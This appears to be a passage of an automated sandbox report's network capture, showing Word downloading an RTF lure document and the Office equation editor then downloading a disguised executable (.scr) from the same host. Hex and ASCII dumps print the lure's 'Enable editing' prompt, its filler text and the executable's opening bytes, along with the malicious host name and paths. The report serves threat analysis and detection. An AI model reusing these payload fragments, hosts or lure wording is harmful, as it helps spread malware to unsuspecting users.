            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A70rgjzjbrvc%2BcapqPJmBHoxB0jWiN8pi0XMBU3BfqA2%2BEYqV5tOEjs9tq3wceZUr%2B65hPExfFF4nlWBDyQKrV0kVa%2B1L253%2B2m35CrlMlKSdcYu%2Fe9vtyvZ9z0%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3674d2ba08cbf-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:53 UTC230INData Raw: 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
            2024-07-05 00:57:53 UTC6INData Raw: 31 0d 0a 0a 0d 0a
            Data Ascii: 1
            2024-07-05 00:57:53 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.2249166188.114.96.34432640C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:54 UTC347OUTGET /obb.doc HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: riell.top
            Connection: Keep-Alive
            2024-07-05 00:57:54 UTC829INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:54 GMT
            Content-Type: application/msword
            Content-Length: 549151
            Connection: close
            Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
            ETag: "6685f5f6-8611f"
            Expires: Thu, 31 Dec 2037 23:55:55 GMT
            Cache-Control: max-age=315360000
            CF-Cache-Status: HIT
            Age: 82777
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QPr6VzGL8Kmvj81PAaGN85uYVQ9%2Ff%2FQVAlxx3O5R9Xh6AAt2RDOPh4hYR48qCwf57cHnzwDDvcGo1O3tSWOuispqisWtgLioRnqPd%2FsVLqUVNVdIjbB8IEy11R0%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e36752dc2e8ccd-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:54 UTC540INData Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 71 47 64 4a 6f 79 7a 35 48 58 67 37 36 51 38 69 6e 43 52 37 73 4e 74 32 57 55 69 4b 53 4f 38 7a 36 74 59 46 7a 57 41 39 4a 66 65 43 76 71 45 48 52 4b 77 75 61 78 34 68 74 43 32 30 61 55 4b 77 67 70 6d 57 50 59 37 39 71 56 67 4b 6f 49 56 62 31 72 56 6b 51 4d 32 45 76 45 67 78 42 53 42 37 71 45 70 57 73 6a 72 78 7d 0d 0d 7b 5c 36 31 39 36 33 37 39 36 31 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 72 65 20 66 61 69
            Data Ascii: {\rtf1{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}{\619637961please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fai
            2024-07-05 00:57:54 UTC1369INData Raw: 73 73 61 72 79 20 74 6f 20 0d 0d 0a 70 6c 61 6e 20 74 68 65 20 61 75 64 69 74 2e 20 41 75 64 69 74 6f 72 73 20 75 73 65 20 74 68 69 73 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 61 73 73 65 73 73 20 74 68 65 20 72 69 73 6b 20 6f 66 20 6d 61 74 65 72 69 61 6c 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 20 6f 66 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 0d 0d 0a 73 74 61 74 65 6d 65 6e 74 73 20 61 6e 64 20 74 6f 20 64 65 73 69 67 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 61 75 64 69 74 20 70 72 6f 63 65 64 75 72 65 73 20 74 6f 20 6d 69 6e 69 6d 69 7a 65 20 74 68 61 74 20 72 69 73 6b 2e 54 68 65 20 64 65 66 69 6e 69 74 69 6f 6e 20 6f 66 20 67 6f 6f 64 20 69 6e 74 65 72 6e 61 6c 20 63 6f
            Data Ascii: ssary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal co
            2024-07-05 00:57:54 UTC1369INData Raw: 65 20 6f 66 20 61 20 64 65 66 69 63 69 65 6e 63 79 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 92 73 20 0d 0d 0a 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 77 68 65 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6c 61 63 6b 73 20 74 68 65 20 6b 6e 6f 77 6c 65 64 67 65 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 74 6f 20 0d 0d 0a 70 72 65 70 61 72 65 20 69 74 73 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 66 6f 6f 74 6e 6f 74 65 20 64 69 73 63 6c 6f 73 75 72 65
            Data Ascii: e of a deficiency in internal control thats severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosure
            2024-07-05 00:57:54 UTC1369INData Raw: 63 6f 72 72 65 63 74 65 64 2e 4f 74 68 65 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 64 65 6e 74 69 66 69 65 64 20 0d 0d 0a 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 6f 72 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 6e 65 65 64 20 6e 6f 74 20 62 65 20 63 6f 6d 6d 75 6e 69 63 61 74 65 64 20 69 6e 20 0d 0d 0a 77 72 69 74 69 6e 67 2e 20 49 66 20 61 75 64 69 74 6f 72 73 20 64 65 74 65 72 6d 69 6e 65 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 61 72 65 20 69 6d 70
            Data Ascii: corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are imp
            2024-07-05 00:57:54 UTC1369INData Raw: 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 2e 44 75 72 69 6e 67 20 74 68 65 20 63 6f 75 72 73 65 20 6f 66 20 61 6e 20 61 75 64 69 74 2c 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 6d 69 67 68 74 20 61 6c 73 6f 20 0d 0d 0a 69 64 65 6e 74 69 66 79 20 6f 74 68 65 72 20 6d 61 74 74 65 72 73 20 74 68 61 74 20 61 72 65 6e 92 74 20 63 6f 6e 73 69 64 65 72 65 64 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 2c 20 62 75 74 20 61 72 65 20 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 20 66 6f 72 20 73 74 72 65 6e 67 74 68 65 6e 69 6e 67 20 70 72 6f 63 65 64 75 72 65 73 20 61 6e 64 2f 6f 72 20 0d 0d 0a 6f 70 65 72 61 74 69 6e 67 20 64 65 66 69 63 69 65 6e 63 69 65
            Data Ascii: t or those charged with governance.During the course of an audit, the auditors might also identify other matters that arent considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencie
            2024-07-05 00:57:54 UTC1369INData Raw: 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 77 69 74 68 20 76 61 6c 75 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 55 73 65 64 20 70 72 6f 70 65 72 6c 79 2c 20 74 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 63 61 6e 20 62 65 20 61 20 0d 0d 0a 62 65 6e 65 66 69 63 69 61 6c 20 74 6f 6f 6c 20 66 6f 72 20 61 73 73 69 73 74 69 6e 67 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 69 6e 20 66 75 6c 66 69 6c 6c 69 6e 67 20 74 68 65 69 72 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 25 34 34 25 36 46 25 36 33 25 37 35 25 36 44 25 36 35 25 36 45 0d 0d 0a 25 37 34
            Data Ascii: h governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74
            2024-07-05 00:57:54 UTC1369INData Raw: 36 35 25 36 45 25 37 34 25 36 39 25 36 46 25 36 45 25 36 31 25 36 43 25 32 30 25 36 39 25 36 45 25 37 34 25 36 35 25 37 32 25 36 31 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 0d 0d 0a 25 37 33 25 32 30 25 37 34 25 36 46 25 32 30 25 37 30 25 37 32 25 36 46 25 36 44 25 36 46 25 37 34 25 36 35 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 37 30 25 37 32 25 36 46 25 36 34 25 37 35 25 36 33 25 37 34 25 37 33 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 33 25 36 35 25 37 33 25 32 45 25 32 30 25 34 37 25 37 35 25 36 35 25 37 32 25 36 39 25 36 43 0d 0d 0a 25 36 43 25 36 31 25 32 30 25 36 44 25 36 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 33 25 37 34 25 37 32 25 36 31 25
            Data Ascii: 65%6E%74%69%6F%6E%61%6C%20%69%6E%74%65%72%61%63%74%69%6F%6E%73%20%74%6F%20%70%72%6F%6D%6F%74%65%20%74%68%65%20%70%72%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%72%61%
            2024-07-05 00:57:54 UTC1369INData Raw: 30 25 36 46 25 36 32 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 45 25 36 37 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 35 25 36 45 25 36 34 25 36 35 25 37 32 25 37 33 25 37 34 25 36 31 25 36 45 0d 0d 0a 25 36 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 36 33 25 37 35 25 37 33 25 37 34 25 36 46 25 36 44 25 36 35 25 37 32 25 32 37 25 37 33 25 32 30 25 37 30 25 37 32 25 36 39 25 36 33 25 36 35 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 36 32 25 36 43 25 36 43 25 32 30 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20
            Data Ascii: 0%6F%62%73%65%72%76%69%6E%67%20%61%6E%64%20%75%6E%64%65%72%73%74%61%6E%64%69%6E%67%20%74%68%65%20%63%75%73%74%6F%6D%65%72%27%73%20%70%72%69%63%65%20%61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent auditors
            2024-07-05 00:57:54 UTC1369INData Raw: 63 6f 75 6e 74 20 62 61 6c 61 6e 63 65 73 20 6f 72 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 20 64 69 73 63 6c 6f 73 75 72 65 73 2c 20 79 6f 75 72 20 69 6e 74 65 72 6e 61 6c 20 0d 0d 0a 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 63 6f 6e 73 69 64 65 72 65 64 20 74 6f 20 62 65 20 64 65 66 69 63 69 65 6e 74 2e 41 75 64 69 74 6f 72 73 20 65 76 61 6c 75 61 74 65 20 65 61 63 68 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 79 20 6e 6f 74 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 74 68 65 20 0d 0d 0a 64 65 66 69 63 69 65 6e 63 79 2c 20 6f 72 20 61 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 64 65 66 69 63 69 65 6e 63 69 65 73 2c
            Data Ascii: count balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies,
            2024-07-05 00:57:54 UTC1369INData Raw: 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 64 65 63 69 73 69 6f 6e 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 6e 6f 6e 70 72 6f 66 69 74 73 20 74 68 61 74 20 6c 61 63 6b 20 74 68 65 20 61 62 69 6c 69 74 79 20 74 6f 20 0d 0d 0a 70 72 65 70 61 72 65 20 74 68 65 69 72 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 6f 66 74 65 6e 20 66 69 6e 64 20 69 74 20 63 6f 73 74 20 70 72 6f 68 69 62 69 74 69 76 65 20 74 6f 20 72 65 6d 65 64 79 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 20 62 79 20 74 72 61 69 6e 69 6e 67 20 63 75 72 72 65 6e 74 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 62 79 20 68 69 72 69 6e 67 20 0d 0d 0a 61 64 64 69 74 69 6f 6e 61 6c 20 65 6d 70 6c 6f 79 65 65
            Data Ascii: a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employee


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.2249167188.114.96.34432640C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:55 UTC136OUTHEAD /obb.doc HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: riell.top
            Content-Length: 0
            Connection: Keep-Alive
            2024-07-05 00:57:55 UTC839INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:55 GMT
            Content-Type: application/msword
            Content-Length: 549151
            Connection: close
            Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
            ETag: "6685f5f6-8611f"
            Expires: Thu, 31 Dec 2037 23:55:55 GMT
            Cache-Control: max-age=315360000
            CF-Cache-Status: HIT
            Age: 82778
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTloxqoh1VGrz%2FyRWt5CSM%2FuuwDqiuABJCpawDbo4OuV4I%2Bzb63A7EN6rZuKdqDNvsm20XOnPpfI%2FmC7SHkb%2BnUwEy%2FC%2B66LeJ0KFHHYdEDMKHVZVWUWwG2YS%2Fw%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3675ace624373-EWR
            alt-svc: h3=":443"; ma=86400


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.2249168188.114.97.34433320C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:56 UTC303OUTGET /obb.scr HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: riell.top
            Connection: Keep-Alive
            2024-07-05 00:57:57 UTC767INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:57 GMT
            Content-Type: application/x-silverlight
            Content-Length: 520704
            Connection: close
            Last-Modified: Thu, 04 Jul 2024 01:04:33 GMT
            ETag: "7f200-61c6187abf972"
            Accept-Ranges: bytes
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wtfuH%2FCFCt7HDHL9xO7kpb%2ByTxfjFq1%2Bjs5EfsiyykGoTeNtIBnuld0elNRWgSdaGWTT%2FQeE1%2BW6iBdq2UnldO%2F04bqkUgp11Gtm56Z7BYsbczWqV%2Bc8JIue7o%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e367625a0443d3-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:57 UTC602INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 3a 2c 92 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e8 07 00 00 08 00 00 00 00 00 00 be 06 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:,0 @ `@
            2024-07-05 00:57:57 UTC1369INData Raw: 00 00 26 02 28 31 00 00 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 22 02 28 36 00 00 0a 00 2a 56 73 07 00 00 06 28 37 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a 9e 02 14 7d 05 00 00 04 02 28 38 00 00 0a 00 00 7e 35 00 00 04 74 54 00 00 01 28 39 00 00 0a 26 02 28 1b 00 00 06 00 2a 0a 00 2a 2e 28 05 00 00 06 80 04 00 00 04 2a 22 00 73 09 00 00 06 26 2a ca 72 81 03 00 70 80 34 00 00 04 28 5a 00 00 0a 28 25 00 00 06 6f 5b 00 00 0a 6f 5c 00 00 0a 1f 23 9a 80 35 00 00 04 00 28 5d 00 00 0a 80 30 00 00 04 2a 92 02 1f 1f 7d 33 00 00 04 02 28 31 00 00 0a 00 00 02 02 7b 33 00 00 04 17 58 8d 08 00 00 02 7d 32 00 00 04 2a 7a 02 28 31 00 00 0a 00 00 02 03 7d 36 00 00 04 02 04 7d 37 00 00 04 02 05 7d 38 00 00 04 2a 7a 02 28 29 00 00 06 2d 08 02 28 2a 00 00 06 2c 0c 72 a3 03
            Data Ascii: &(1*"*"(6*Vs(7t*}(8~5tT(9&(**.(*"s&*rp4(Z(%o[o\#5(]0*}3(1{3X}2*z(1}6}7}8*z()-(*,r
            2024-07-05 00:57:57 UTC1369INData Raw: 01 00 06 02 03 73 a4 02 00 06 7d 3e 00 00 04 02 04 28 69 00 00 06 2a 96 02 73 2d 01 00 06 7d 3d 00 00 04 02 28 2c 01 00 06 02 03 73 a1 02 00 06 7d 3e 00 00 04 02 04 28 69 00 00 06 2a 22 02 03 7d 3e 00 00 04 2a 1e 02 7b 3d 00 00 04 2a 1e 02 7b 3f 00 00 04 2a 22 02 03 7d 3f 00 00 04 2a 1e 02 7b 40 00 00 04 2a 22 02 03 7d 40 00 00 04 2a 6a 02 28 2c 01 00 06 02 03 28 6d 00 00 06 02 28 6e 00 00 06 04 6f 33 01 00 06 2a 1e 02 7b 42 00 00 04 2a 22 02 03 7d 42 00 00 04 2a 1e 02 28 29 02 00 06 2a 56 02 28 29 02 00 06 02 03 28 72 00 00 06 02 04 28 74 00 00 06 2a 1e 02 7b 43 00 00 04 2a 22 02 03 7d 43 00 00 04 2a 1e 02 7b 44 00 00 04 2a 22 02 03 7d 44 00 00 04 2a 56 02 28 29 02 00 06 02 03 7d 45 00 00 04 02 04 28 7b 00 00 06 2a 3e 02 03 04 73 27 01 00 06 05 28 76 00
            Data Ascii: s}>(i*s-}=(,s}>(i*"}>*{=*{?*"}?*{@*"}@*j(,(m(no3*{B*"}B*()*V()(r(t*{C*"}C*{D*"}D*V()}E({*>s'(v
            2024-07-05 00:57:57 UTC1369INData Raw: 6b 00 00 04 2a 3a 02 28 7d 00 00 0a 02 03 28 e9 00 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 e8 00 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 1e 00 00 02 2a 4a 02 73 ad 01 00 06 7d 70 00 00 04 02 28 d9 01 00 06 2a 1e 02 7b 70 00 00 04 2a 76 02 73 2a 02 00 06 7d 72 00 00 04 02 73 2a 02 00 06 7d 73 00 00 04 02 28 29 02 00 06 2a c2 02 73 2a 02 00 06 7d 72 00 00 04 02 73 2a 02 00 06 7d 73 00 00 04 02 28 29 02 00 06 02 03 28 f9 00 00 06 02 28 fa 00 00 06 04 6f 31 02 00 06 2a f2 02 73 2a 02 00 06 7d 72 00 00 04 02 73 2a 02 00 06 7d 73 00 00 04 02 28 29 02 00 06 02 03 28 f9 00 00 06 02 28 fa 00 00 06 04 6f 31 02 00 06 02 28 fb 00 00 06 05 6f 31 02 00 06 2a 1e 02 7b 71 00 00 04 2a 22 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 1e 02 7b 73 00 00 04 2a a2
            Data Ascii: k*:(}(*:(}(*J(~ot*Js}p(*{p*vs*}rs*}s()*s*}rs*}s()((o1*s*}rs*}s()((o1(o1*{q*"}q*{r*{s*
            2024-07-05 00:57:57 UTC1369INData Raw: 00 04 18 5f 2d 25 02 02 7b 99 00 00 04 18 60 7d 99 00 00 04 02 7b 9e 00 00 04 25 2d 03 26 2b 0b 02 7e 86 00 00 0a 6f 87 00 00 0a 02 7b 94 00 00 04 2a da 02 7b 99 00 00 04 17 5f 2d 25 02 02 7b 99 00 00 04 17 60 7d 99 00 00 04 02 7b 9d 00 00 04 25 2d 03 26 2b 0b 02 7e 86 00 00 0a 6f 87 00 00 0a 02 7b 93 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 76 02 73 ee 01 00 06 7d 93 00 00 04 02 73 2a 02 00 06 7d 94 00 00 04 02 28 76 02 00 06 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 66 02 7b a2 00 00 04 2d 0f 02 28 8a 01 00 06 6f 80 00 00 0a 16 fe 02 2a 17 2a 5a 02 03 7d a2 00 00 04 03 2d 0b 02 28 8a 01 00 06 6f 88 00 00 0a 2a 66 02 7b a3 00 00 04 2d 0f 02 28 8b 01 00 06 6f 80 00 00 0a 16 fe 02 2a 17 2a 5a 02
            Data Ascii: _-%{`}{%-&+~o{*{_-%{`}{%-&+~o{*{*"}*vs}s*}(v*{*"}*"}*f{-(o**Z}-(o*f{-(o**Z
            2024-07-05 00:57:57 UTC1369INData Raw: 00 04 02 28 2c 01 00 06 2a 96 02 73 2d 01 00 06 7d c0 00 00 04 02 28 2c 01 00 06 02 03 28 e0 01 00 06 02 28 e1 01 00 06 04 6f 33 01 00 06 2a aa 02 73 2d 01 00 06 7d c0 00 00 04 02 28 2c 01 00 06 02 03 73 a4 02 00 06 28 e0 01 00 06 02 28 e1 01 00 06 04 6f 33 01 00 06 2a aa 02 73 2d 01 00 06 7d c0 00 00 04 02 28 2c 01 00 06 02 03 73 a1 02 00 06 28 e0 01 00 06 02 28 e1 01 00 06 04 6f 33 01 00 06 2a 22 02 03 7d bf 00 00 04 2a 1e 02 7b c0 00 00 04 2a 56 02 28 2c 01 00 06 02 03 28 eb 01 00 06 02 04 28 ed 01 00 06 2a 6a 02 28 2c 01 00 06 02 03 73 a4 02 00 06 28 eb 01 00 06 02 04 28 ed 01 00 06 2a 6a 02 28 2c 01 00 06 02 03 73 a1 02 00 06 28 eb 01 00 06 02 04 28 ed 01 00 06 2a 22 02 03 7d c3 00 00 04 2a 1e 02 7b c4 00 00 04 2a 22 02 03 7d c4 00 00 04 2a 22 02 03
            Data Ascii: (,*s-}(,((o3*s-}(,s((o3*s-}(,s((o3*"}*{*V(,((*j(,s((*j(,s((*"}*{*"}*"
